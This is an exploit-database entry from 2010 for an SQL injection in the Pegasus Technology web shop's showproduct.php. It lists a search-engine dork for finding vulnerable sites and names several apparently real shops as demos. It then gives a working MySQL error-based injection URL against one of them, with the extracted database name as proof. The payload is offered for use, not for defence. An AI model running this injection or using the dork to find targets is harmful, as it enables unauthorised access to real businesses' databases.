Pegasus Technology - Remote (showproduct.php) SQL Injection

2010-11-01T00:00:00
ID 1337DAY-ID-14680
Type zdt
Reporter KnocKout
Modified 2010-11-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
Pegasus Technology - Remote (showproduct.php) SQL Injection
===========================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm KnocKout member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
##########################################################################################################################
[~] : Kopuksuz biranin, LIMITLI KREDI KARTLARININ VE Sensiz Hayatin AMINA KOYIM OSMAN! Dogum gunun kutlu olsun Kardesim. 
##########################################################################################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Pegasus Technology
|~Price : N/A
|~Version : N/A
|~Software: http://www.pegasus.net.gr/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /pegasus/h002/
|~sqL : MySQL error based
|~Google Keyword : inurl:/pegasus/h002/
|~Good.:)
|[~]Date : "31.10.2010"
|[~]Tested on : (L):Vista (R):Microsoft-IIS/6.0 PHP/5.2.13
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos: http://www.erotic-boutique.gr/pegasus/h002/
http://www.e-inkpoint.com/pegasus/h002/
http://www.melampus.eu/pegasus/h002/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| MySQL error based~~~~~~~~~~~}|
    
    http://VICTIM/$path/pegasus/h002/showproduct.php?code=-0000000 {SQL Injection}
    
    Ex; http://www.erotic-boutique.gr/pegasus/h002/
    
    [~] SQL Injecting
    http://www.erotic-boutique.gr/pegasus/h002/showproduct.php?code=-00000000000000 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
    [~] MSSQL Error : pegasus_mysql_use: Duplicate entry '~'erotic_db'~1' for key 1 
    [+] DB Name : 'erotic_db' [OK]
    
    To your Continue..
    
    http://inj3ct0r.com/exploits/14509
    
     .. 
    =============================================================



#  0day.today [2018-02-16]  #